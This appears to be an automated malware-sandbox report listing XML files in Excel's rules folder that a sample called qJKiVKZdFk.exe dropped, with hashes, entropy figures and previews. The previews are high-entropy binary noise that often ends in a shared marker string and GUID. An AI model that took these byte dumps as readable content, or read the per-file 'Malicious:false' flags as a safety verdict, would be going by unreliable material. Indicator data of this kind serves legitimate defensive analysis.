                                                                                                                                      MD5:A0583BBC641CF9EA2A22658AECC17265
                                                                                                                                      SHA1:7CD8CE9D9198A62809A447F2FA9C886E5BCC5EDD
                                                                                                                                      SHA-256:4C72075FF68697146F67172947D6B4C02E482BD3F181DA25766B961BF53AE38B
                                                                                                                                      SHA-512:B122D1FE34C0D6F63699C75EE27C9117F80C9BA160B03C2C2C6486932D961DD14C73CA97E53F0B8749A2384ABAC3C34DBF67FF10ECB0DC6CE4A6EDD68E00B137
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml]Y..U&.../.VK8..u...zDF......[1.s......]....'.....=Im74d........p..I*%..:5..l..KEC..R.v.X%...';....6...?B....}..^E.M.Vj^jB.*.f..[M..Bw..]....&e.).R\..J.P.S{.."..G..'.!b..7.C..(..|.Q.*..69`...v..3_..m$....\.oD!..(..^..7A...C.....z...W..W,.-~S...#r._.l.j...8.P9......... d.k>>.v.Z..Tn...K?...;...<(.8....&C....:....[......./v..9......s.FQ.#_....+I.(.h.=.....)...T......y8v2.....UA.Iz....>...r`.[..{..f.8.(Y..X.kc/.g.........l...-..X....7...../.m.f.-......s.j.....BT&..7..u$. @.A.8.`.._9..nA..t.AS....7K5.I...M.d.b.tvs.CbXW.....f.....b~..t..uNf..:.aAw...r........B.IIW..K|#.....v..<uy"...)<.`BX..2I.^..pT..d.....d........Uu E.l. ..t...../`..f....@..).P.V..\..@?.....\....S......S?.....|a....L.?.Z.....XjP..8.....?).N.e..C....W .Y.,..x*.n...1x......[...$..P.V...Ri...[..f'..".k$.Az..R..|.Q.d..'. .JX1.SF......#.6.....&.M......f].]....`Wj`..0.L.....>..l.....$....<.hy.%.^jd.s".,.,..M........t.R.Y.[B...]G.....#..<x.....".....1......9Y..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170037v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1503
                                                                                                                                      Entropy (8bit):7.840699525003406
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:umG9TRGq8K8r/fGnE9iUW0O5XZbce5ho3HM4ugDXcO2GVeyFjBsHbBggCp8wOdvk:XGxE76E9RW0O1PWHak2GVjBsHNZCp8b8
                                                                                                                                      MD5:7CB4F943A84E382528C5FC0F59092BCA
                                                                                                                                      SHA1:39CFC287B7D95244ED7D02F4F9E667D0B249EB00
                                                                                                                                      SHA-256:C31C098CD10AAEECC29B7619B1FAE1B543668399C18880A2784D74C8A6D5D8EB
                                                                                                                                      SHA-512:B943C748983974197D7AE17B225D295ED386EA1EC708B4437ED267DB98F38E543C9F84FFAB094C34449814152A531977650D6DED340841FD58A7522619CE13DE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......B......".m ./9]...(....4f....Q.M.E.EH.O...7..G/..]/b........e.9.......&ukWLB..h.d.e..T.....C....=.YZ.\.:...+.V.1..... i.A..N..S.a.AYE..9;.....b.G.|J...~O}..Cj.>oJ8.q2*@ Fj.8yBi.('..1...R8.x..v....Z.,....e......v$....D..5....&M..#....p...Nq.q.2.#.......p.<.<..E.~.}...G...I..xA..8.,....%.5~/..9....yZ.F....#*...y..p....UO...8G...9B.cF.x~].Z..)'.......'.p.a.........r..l.d....G<..I$...f-......V..C.;e...?Oy.Z|~..e..#..H..D[tq....b.T...S.v..o.a$]u....X.^.k4.Q.X.q.[.....5j.J.1....... .w...`X.K..........k+..Y}z5.!.Dc!..s...i..Y.....\Q.s..L.1N.q..b-...vf-\......P..".+9.u....A.DJqP....b......0:.N........;.Vuj(.....S..9X.=.....v.h|O..XW4.'i..A.-....Q......;(.6.M..............[)..e.K..kQ.!..._..Mf..-.#EM....U|..;...Y..4M..Y.)RpA......d....I]8-.S.S.....q.*.<0...M..gB......7.h.aH..4..<b&.Y..J.....a.....]....#..s.r.D[c..$.p.s...7.........bXid.)Ex.o..`]..)9...aZ.U.....>B^.w..z.D. f....F.R..+.....h......<.o..Ih.F.t..c.T...,V.2..8s..#.T

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170038v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1036
                                                                                                                                      Entropy (8bit):7.791858992341981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:RaEmUC0rt5JI3NHats0GHWQhvAxGyOXKEpiyuoFi5V5tBsbD:RaJsp9XCWUAxGXKgdoNtBmD
                                                                                                                                      MD5:712970584F1EA206C9E3EB4226C72BEC
                                                                                                                                      SHA1:C22006158A9D6C6EA48CF8CC5200F53CC46D6616
                                                                                                                                      SHA-256:DEA24C06F2F269E0E49877A8415312A2FF513C89137495462AD155893914F5BB
                                                                                                                                      SHA-512:11894A43785CBA49AEFE57CE2A53B69B30614A9C9F7BE06274E7D9BA57CFA28B33B346577D80A8F239B48AFD77C4D8EC3C64C02CC6D942737D21FBBC8CC1C19D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.,=9\#...O.!..Pc@(^._.C.x..........~h...E.j4..[2.c...b.D....Jg.+.-x.L...!.9R{"...7...#.X..-.l..Z!e.Z...}..K...T.p.D..".Tv.....eT.h......Xv.d...zS...:..v......z..4....>..(.S...:...m].;..%..k..;.d.....:.].....D...j.V...]%~._..IFD..k.p.....Qu.#.1..u..Bv.R..x..h...=.......V..Rd.f....)...%*.e........`i.T.....z../{WQ....1.X.N.q.........Uj..{5N..#r.BO..U{.;K........k.}.a7.....||`..)....Bq.z..6.w.....;.8n.Z.MD.V.. YY k......6.E[l.>(...U?.M<.5..8.....v...w..m......+p...'..x..G...m....|(....C.l#..)...$..|2...Ks..?..#.*/rxx...y6..-..!5}...YK>.......6.>......:..JfD.1~Eh..2[...'.a....DAL.~.M...K.i......(..:..T..p.S.-...m......-O..#......3=....BT...B....eIr.a.z.aH...]....^..|.."....i..r..SE.t.Z..a....+A8!...;.0...\..:..V.r...W.Pc{."...-...F.1Zd...W...Q.&q..:.3.........7K,.......20............J!...L .AZ:.LL.x...t#v.!m..%.?M./1.]I......[...(..fa`-.....u[......xzc ..4..&26...7.........W.......i..".P. 1..p`.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{3

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170039v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):934
                                                                                                                                      Entropy (8bit):7.760224036709835
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:l4BsMKquNHGaCDv4+zA3mvkYsOriqKVixqNPcjTBAbD:lNTBG/r2mrsOWqEixycjTBaD
                                                                                                                                      MD5:FF790403D32F4F68568D8677FC0CA3B9
                                                                                                                                      SHA1:E4886A18DEEC2692A411DF2BC8EA76916EC5C84F
                                                                                                                                      SHA-256:08A886FEF972A6A6CA0018B551249795A5DDB87441918A8C08888FBAA5D68AE5
                                                                                                                                      SHA-512:B2A623D0BFE799D55C10E2F693C28F494DDA2497CFAD8E23ADBE56765BDACB36BBCDE295F180FB7FAD9574CD307819CEED20E5324594A2143F2DF3F7162B1611
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlX.5-?...Q...[....i........J..-EAB...v..R.A.......?..4..l..i.e..`v;..../.....&\vj..8.=v.7..Z...R.....@....\.x..C;....I...4.r!.i3.H$.L....\u...$Y%...e)U1...c,.ixMT..R.".....=...I+.].....Y)..IF!..P...&.+VM.D..jn.u...iZRx$..... .D..f..W....G......i(.O..0.h...[.#....K.i.Ww.>....%<.;....p>l..e=J...E..8...w...w.K...W2|V.8..D....6{...Z.Q.IR..=..w.*......#.;...0..I'..+M...H........v1.........Q.........(...[d3O..Jr^d.1...qR2.....;..b.~...}.W...<.t...........d..9..DUA$C".B<`..!-'BUc,T..P....,.....ru.B/..d..ZA*Q.<...}.(.'..&..R...Z..yz2H.._.o.i...W..........>.......^..........I...+..\..M....l.}.=c?..t..K.......s.he..a..U.............m.G,4..>.t..8|Q.{.=h.~l#i.g..-\f...W..n...Kw.K...>0..V(.(...-..v...9..VGsD5..(.:.,.v~.U.G.Q."............mpC....6qT....8..~.-?..*t..X.G$.....[WU.D.Hv.+..*..\.j#...^...*.........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170040v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):723
                                                                                                                                      Entropy (8bit):7.707413070059119
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:nK0Ni1Rx9LvrJ3wi7lDF29Q1TtEdHKcGW8F5R+iZeuJ9z0ukIcii9a:nK0yRx9jrJgQF2ypEdqzW8F5Pei1bD
                                                                                                                                      MD5:3786FD2E4574DE7D9DC75AD0319F87E9
                                                                                                                                      SHA1:07B02C1617BDCF158065E3BE75CD07510AB3425F
                                                                                                                                      SHA-256:2DA5E3A2132FC2C955D3FCD92DB4DC8C61D90DCA45A924AED7E6DBBC8FA09005
                                                                                                                                      SHA-512:4D8CCF6B7641A0C947AB7D487C91BABA88E1F2D8E210040E46924DD9412426A7C352A0D881FB51ADCEF5472928B3EB7BBBCCE0859B708DDC74E8199EFA9F3579
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...J..3...i..b(.,.'.`.......2f4.........m..*..vL.r:.C.3.....#.... ;.a.O.f#......S...6Hy@.2.G.........A4.V..%....r^.U..$...,]@...F.....j...A..,bJ....b..;)..&M.....5x]g..d.....u?...8'..p.~j......7...q.i..j.@.j...4-.!...Z[...."...FT...@|f\!....F..Pw....2....h..u.\..u...1.t...K.;L.._.$#.eL.,z.+*}L>D&....7..P...Nx..@..J..?{.........l..^.>..=/.x.q..:N`=.Lb.*...x...e9..H...]3E...e..6.. *.1..X....Q....r1.q......^...$O....E.m.z.`..."....\...d...&n....j.x6.`q..}.$.>..q.G.2.s..E$1....:hn..N:)....|........G.?.I..P.~..p..J[.f.Uu.._.E.........[.c.0...~.g|..}.?;E.yB&...H......i.|..K.D...v%.d.....hxd]...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170041v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1089
                                                                                                                                      Entropy (8bit):7.844995843956593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QsVvCNVK7CbKaToote5HZAtCtanZ2Etse16T/pjfzlbD:QsVvCNgSTpAWCtOMb5D
                                                                                                                                      MD5:F4FF99AD8D959EBD2949E6D16DD69D38
                                                                                                                                      SHA1:BD4E6D0A02505F4AD18C332904C58A502EB0E883
                                                                                                                                      SHA-256:0AF2173EBFFC2EBB0F07969E0570F1532BAF21D8E6CE29CDBA36958489961CEC
                                                                                                                                      SHA-512:4407104B5C85B6D9655639941D2B1C78909EF185EBBB4FA87124D72AEA141F7C8FD63CCAEC9DE9D904A548B99F5BEEF980C9FDA17DC61AF7342AA46E85BC3C52
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlm.C..cE.....n.@..h..m.`..DD(y......J\..s!z..D..p.........j.5.&..W.|%Ln..i..).........Y.bET!. ..q.=.$..V[.u....~...@...JS..b...9.O,5!........+.M.u...*.gm'<O#.:...,.z;...M.r...J~h{%..r...Y.y....e.?.0..bqs.......x........W...Q.2.d...V.....:..@k...._.4>E..}..O.-...q......F...V..,..A.Al.G.n.:.pY...6.=........bIp..(..%.uh.<8bc.k...a4.0....bW......j.0....L.1C..z.^.<.H.g6.........x.....s..;+.....\.....d.q{.V.U\'......'3....u..4.[29t.........f..4;3...9..L..<G.n...'...W.d.....V.p~...Q.....:.ZI..v=.!.R8z..x({j.U......t1...%.+..#.,...h..<5t..Q..D.A.W.|.R.8.?r..[B..;.....5W..z.T.X...v.u.X.E..y%..F.Vt....y..n.h.B......sm.|..\..s..u1...z6>_V..K.N..$.o..9..~..S.......Ja6=...:kC.E...mn..[.[....}...i....s.#./..O.P..)-.G.<.........VX.xP~.]B..f...zx-..?.i.U....^Z...L.5..&}.q...d...@..I.|.~c.k,.1:....+........yP.G.Ow..[.>!n.).1.o.L.....HL..J}=_.l(.|. N...6..:.".3.....i..a..%........[..v...qJ..%..3./..."..G....r........4..?..=P*.SQ.i......v....n

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170042v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1049
                                                                                                                                      Entropy (8bit):7.805693717202726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:WpwtRDWarKMjx2Jl0G4HQJTzuiR6AWrrbD:WpkDTmMjML0fwsoOrPD
                                                                                                                                      MD5:72B29550D67717C333F3905749385DF1
                                                                                                                                      SHA1:6EAA50C67D849E0AC58FCAF0951EBFB9DA02B7BC
                                                                                                                                      SHA-256:A06B5EDCFB752349C033BD9D756EE12BC6368BA09C14F54BBC987E4131E3B1C2
                                                                                                                                      SHA-512:9CD2703D2D3104F7C5F353E5E6A33C522D6AC62C7955A6E433819DCF0C61412405ED9D458A29E28EF9F8516F1F582C05D8362354CB5332C308637EA25D90B559
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlN& ..8.z..3.%.....t.f.Q......|)..;{a......D.*.g....!.i..c.....Ouj0....v...w..........|..I.;...8P.....o...a.u.E....J9...A..!.....z.{.GL.............-..I.....x.v8..|..Y...\`.......Q.E.r..p.....?h.|.`...r......{.}. ...m..&.....AYa..j....a.oI....D.H.B-.|b2o..).....#....X...3......W*....5.!.O.....\8...q.R!...v3..F.....O/.hC6...q....._.y.p.....x.O.`j...Xb?..w.Z...@-e.....t..-NZ$.....4.........F..1.-......)f.u*.k."' {...fYv.f.t......Am.j.%.(.$...M..?.....W.l.XN..._..#.(..s.A..a.:...[!J..ir.a.G2...@._.5=9.....P....p...zX.}.E..2.w..d..l.3D9fR=.'.5v.H;D...U.`.............3.C....R..+.%.<..W..5.~.:.r.d..BZy.|W.8v.t..}.k...=.a.v........NBKe.....?/d5..}...8....j8.4..x......E..V..zh....i...Vt<.q......e.......*..PL..Je"...(.sG>`..7n'...I.q[.sS.fI..#.W.;.Y;.:vDV^..>p ?..*.u.Vp.......K.;5.......O..NH>.Ei.`...A..o.08f.N........?......\O..KJ.s...I.&....[.....`..W...j.J..PY.U..w..I...X...:..e.|.t0............=...._hA.F..r....o.i....tp8qj68iQwedJUixDcnQEpfFZzicx

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170043v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):807
                                                                                                                                      Entropy (8bit):7.71883136632536
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:UPung25pCGOyxB6WSm1l7XI7ZOhXgTSVWqfSbD:UPung25prOyxBzSm1lbwZWwTmWqfAD
                                                                                                                                      MD5:2C7579083C3A9F9E363B7B36B91B5258
                                                                                                                                      SHA1:0EDE23D83E171B31F860883A58B6A84B3CDF42B0
                                                                                                                                      SHA-256:AEF0842FA54AF5BBC37186905B20DA51DA1E702BAB171B3AD76A692A8A58F916
                                                                                                                                      SHA-512:BA0AF7F2695F7916421DA0E818B2DBFE5DF23BCDE0624038BBEBDB8E2E4D59A933B0DE5F67B6A0B9136BD2958D092A65C6E49010B8882E6072237E36208FC57A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlkn:.b..^.$...\.n....,J.....`..&.Sb8.v8>.uy...A.].4AU|......9.#....u!.o.Bi:.f.|.O.>..6,i?;.+......\....B&..O..B...=d.$.-.Rw(..)1.zr..|c.I..rJ..vn....ii.N.^.l.L.F+Z<...A...9..c .r. Y.*;.M_..E....-..(.$s.]..F@.^.....W.5U.a.<..xU7Z.......Fk...6..y:n..B......_......E.y.EY"..Y.H.....uiR..1b....J.....^^.=...Z...b..J7..."$Le`q......;o.._b2.ZL...@......j.FL.ey.ub..L.-Z.+...D...5N]..g,..wF.z.&..qZ..........2.E..5.I...(."z....cdDdh..2.;qc`.3...1..z..5.. G..&.4&.ov...+J?.'D..<..{..?[.Vk....EG._P..^o.......kA..=..\.....o].A.a.....p......uiY5.......0p._O....R..z.........j.........z...0.d.)....h...x...&.%...v.~=..^.(s.9.D-..Z......b.5q.....Z.......:..y.2....U;....C..t<....fL.."C....+.n..K\=...%.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170044v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):853
                                                                                                                                      Entropy (8bit):7.735470776267979
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:vQJG3+HP3wyFPNoTab50XNRBGqxyKxj7iV4TT3ntOEwWbSeUh3tuYTuCWxSYSq+e:vQJG3P803EKMPEwEGpYSEbD
                                                                                                                                      MD5:0A27811CF2BC6C2FE5D47E3A771B1054
                                                                                                                                      SHA1:96B37C3B0C3D6B5F07A1F24E12DB1444DE9A5C10
                                                                                                                                      SHA-256:CFB8BB0A3B6A0B445FC67D5B6E1BAE825FA16DFFB1AE8AF9662BA6F36DEDEFB8
                                                                                                                                      SHA-512:E30107405BE333FCA588853B61E4E75CC150251A41E287108433FA6EB471274815B223ACC7BADECBE8226AE5D202A58B0AC29E60701D32A7FBAB91E30F3E0098
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..ix..S.W..i.....r.(g.:9w....F....Y.+..~.=.M.......Z7...0....]....h..C.T..<f0.zA.^....[Xv..\....{..~B......q........jE<L...."U.y...nQ.OvY......"n....(=.d..Y..D..[..\...;].B.j.~+...Lr@../.Q..}ko#.......'...1R!.7p...i....P...*.].<y..s........IQH..H.2YR...v....4@z....%..d:.+x......RQ.Y.S....f....q:.{....;.....Y,...0...t..+B..#.R.Y.'....... .z.0.)..(.Fj.5.K..m.x.,...'.....H.S{.. .V.S^.!....c.t...h..<.....i..2{+...O.{..67..>..^A...Y.m.#......i..M..Cf9.}f..$3J6(..[..........B@.7......k.....4m/....Z.:.=..[..id..;....<f.Z=..q....I....x3'g........V..?.%......1.....]+.$.... X<{..=.....U.v....B.Xr.}:..\,(....'8..........h:%'-q7..M..d}O....k..}..|...4..y.9....MG.....x...tnq..8.ka.^..s/x..=...w.XOU.)......s?V....f..$.'s.?....?..r...v.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170048v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):912
                                                                                                                                      Entropy (8bit):7.767166913201102
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:VxJlb6Jp24GR/P90eVtBd+wVNAn+YWxqp/Q+ylBbD:VxDlLzd+wEx8qC+URD
                                                                                                                                      MD5:D4DACAE0FA1E5F4607D3AD51CF78B5EB
                                                                                                                                      SHA1:A442E66787A8B46645404BD21566F417866D67A2
                                                                                                                                      SHA-256:5B44A1F00670C51BA84CC8EB0AFF812F99FB50BD2F6E84140AEE0854D3F459D1
                                                                                                                                      SHA-512:41D16107D49CA260F5E231B724853FB38B5C76E10806C4E7940709D479CF79F8202114282ECD9D10544AEC4D73B2769A93EF9E89AB2F40E21E7DE6F9C65D3D11
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml3....0Y.q.>n..$..O.{8R.[p..T4G.....-...v.....x.DQj:.o.$..6..E[..Tw.9.H_.-.RXN.^x.J.z.R.*.lP..}...Czo.K.g...f.r..........]e..eJ.;..3.}..E.lE_\........?Xh... .kG..2e..l...jD...N....Y..=^|.o.Z.?.hh.......b..+.#..@..=U..l....T...;....t.aa...e=....;......H..J..g~o...89.e,..u.....o......T[.d...poF.`..<...xv.i.LmN.|.(+.c........-Z..J.?.o......W;....A.N..E..E...*...d...E.p...Fl;....Gr..9...#B..l....D....&.J.K.lL.B......".8...R.y.6I|.].....{.o...=...VR..x\..S.......G..s.?.....W...7/.B..M0R.....a..@..Ga~.O./..W...'.g;....^zC.uN.u.T.k...@..#../.>...5..k.@..[v..qd...7..,...(~NT.t...r`..H.Z.pgn..O...aA~1R.)-.?.....&......Da.}g.V..i.^............sQ._...E.._b.G./)n..z4....J..d.....S......&......F3r.+......b b\P}.ee.Iu.W......,..Z0..Q....Z.b..Q..e.;...7e...K.=C@..\.@.......4.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170050v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3310
                                                                                                                                      Entropy (8bit):7.946756230253783
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:oSAFW0dU9rhAMxlKBOQgiUW4Ki0NJ2QgaJif:ob89rhVlKBOJi8KJNY4if
                                                                                                                                      MD5:3CC5F91FCFBF5BD345A288ED0108358E
                                                                                                                                      SHA1:0235F15F786327DF906A9C1AC061F5ADFB2033A8
                                                                                                                                      SHA-256:E371AB8517081E40F14FDD02CC565230EA6820A5B7C87379169AC4ED2C422F76
                                                                                                                                      SHA-512:E6678AE01D6C859EDC5211BAC6F566A992500CA6373D092C25C4124CB3EE8E82267AAC44B52E29E65076D60DBBBE408C0C3B11C03F54BCEAD04ABC7BDEF9A543
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..R./..Au..+%..I...p$...L.p...O..y.Ja.8B2%.0g.....U;.x.......aNx..y.6........<....fh ..>.0N.......Z...c..l.r.w.He.".."...4GN+.?.K.....eg....>...v.?(....%|...T....5....d...%.3..(.O. 2;T.2.W......B]....t.z.......kz....t&<.....%..<G..?.3K.,..Vq......\^..$..s......-..eb*......b.d.l...!....|.>..K....^.......<.........\}......Cl...u...R.#.....o..E.....X...+.=h......1.I]...W8.....T..$..`...&......V*....F.~...4{6....}X.......fAb.....4..(.;...,\o.'o..g.:.$:.."r.........@...pH......$...K..r....C...nM..t..f.p.Yq.>...k.....S9..d._RO1w..{.C..79.v.].U.....w."{....$'..p.......J..X..q_O...7...1$)........*.I.+.a..uP...Q.....M.@.eOA....p..I..A.k.cu.!_...8.Ka..!.........o...]O...%nSYr.c.....o*...}..|..%.2.}.x\..z,.<.9...8..Vw'&.-2a...?u..V..rk......D..4.cr.....bJg-..@Ywh......S..+..#...(...?.a.L..1kI...LZ.~.j..&..k..Aj..#..h`c^...)..W.[J../.c...^..6....{&...H0..C...ao..y.\.....]..(...T..|5..h...S.....~.5...z.....M...w.........7.W.J...e.Q..m..!V..),Iy...ol

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170051v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):910
                                                                                                                                      Entropy (8bit):7.730932031321139
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kif0bkdx4pw2q/TMhvEh1ac9bisk+7mXdSTu4hGPbD:z8bkdxSwfMhvEh1acjqQThuD
                                                                                                                                      MD5:84F9F76C28058D907BB3B0F0AA48F8D3
                                                                                                                                      SHA1:CE905A3D29904A73370DF93F9C1337ACD5554D45
                                                                                                                                      SHA-256:FDEBC3C310B7FAB28EB01448D109E062BD49D47000469FD882691727CFCCE686
                                                                                                                                      SHA-512:05B4032C52C17DB4F8158981DBEA419935A420AE658C84EDB1EC13AB53F37C7C7164BD14A849D055BE5C45ADB852BB8FED162B18FDD6F1B3DB2D96C3C84641E3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml?..8.4....R.& .....*.%..<O.j.......C[....pn.&.a.%.....5.1I.f..3...lCX.E.....z..Q..5.....]o....$N.H..q&.iG..mB..L.<.l.."|....).%....}.".r6...#..).J.?R...g...7l...$.mK:..r......9....R-'...p..@..C....f.b.B`#.6..Zf5..)....8....l....C..%s.j.Z.5....mx.....t.$....q.F.........)}.A:.DiQ..\.E+lW.!..6p)fl.&..r..M.WE..5.5......D....%..718.........MGB.J...{o.g. ..,n.M......}..........Wj.....OpW..=....z..$.Y.n..a....s.`^.b.S......1.{...yq.h...2z ..8..6..........=.{7J...?Q..RY.Z......f......iy.WC...}....V.c`i.eB..3.>R9.i>,bO....g....h-G.:.f.......+,^.e..t...S.)..F..W.a.+F......V.\...N.4.....b.zA.-}4.}..U...r.....1.....&#...-..u....n....n..E.........5......W7..>...,!.SQ.........a^..R.[...'.v..A=`.w.s.|..|..&v.8.....b.x.=W..IU-.w<.^j....4.Uo..^.5.b.F.}%..'......m.=....y.@..z.G.1..8...Z.&tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170052v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):941
                                                                                                                                      Entropy (8bit):7.771188913428196
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:WYURLWc483L2rIhnPDF+bbLinomahersJWbnRDTbD:fURD4+2MhPD2bWTJ0+HD
                                                                                                                                      MD5:1A53C3016CD24BB277D304F48B3C7AE3
                                                                                                                                      SHA1:98D9DB63AE6A158508B31379AD5623303DA13A23
                                                                                                                                      SHA-256:7624A840118D223F74292F1D458298CB8D72C5611FB940F4E9A1781BA0A2C18B
                                                                                                                                      SHA-512:34E581E1B6EE867E2EC9E892AF746F334C08E94F453E2A5DCE56569A1624736FE36D0D0F39CC4C5B75B4DFC127DD24A9F2FCE504AACAA8DC4A4B496609133D57
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..t../..iz.q...>Z..%..>/......c.s...\<k..'...{.z.....II..J...=.g...!Q.xJV......./.{BiCE...u...0..W..r:.oj}UU.........:..s..!.CD....=..};........=.~..p.a....E.kQ.&.....=1.. RD..d..M@..vm])...5.8.%\&.^.....VK.4{..A??..9.Q....i.....l7......h..p.r....$.N-...].0.5X.MY.\A...B..........#.5x[S.,U.".0..$.3rg.IZ..L.7.'...............ocTEQ..}.}Mn...X.N.[....l2...M.e..!..1&.r.;.d..nm.[.....v.].R3..JC...bW.n..B..gJ....C..Q..0N5N..g...>CF.F.....1*.....'KS..J!.k.,.../VqK.....;.=M..l...>........H...h..`..2.<.q...z..=|..Y..o.(55.(.i.M.A.....-..;\.?o.b.<f..7.;.Q"...;..6?T}.7.y.1.........X......!iA.....2...6.<h..M..1.6Ig'!/ j...i.*=..L..G ..0!..gE{.7......8p....~ .<.N..=..*.`..r.#.r........+..?...Y.Q...<..7...%[,.Q1VwaP.lk........vm#T....X.R...x^.....v.>{....).w.z.Q*.^.......0.&.s#Q... .T.....8.......u.....;.Nl.[. ..![..gr.F.K...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170053v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):787
                                                                                                                                      Entropy (8bit):7.680371990676574
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:EDaK0hhdwV0XE4GiGvhnjOVwu8f5fP1GxfPDrqDjIV2Fnuz0PbNesMYfO7w37p71:HCQ1qph5H1GxfLr9tQjYsRLp7WJ0bD
                                                                                                                                      MD5:5026C2DBD552EB68811A45B8FD22DB15
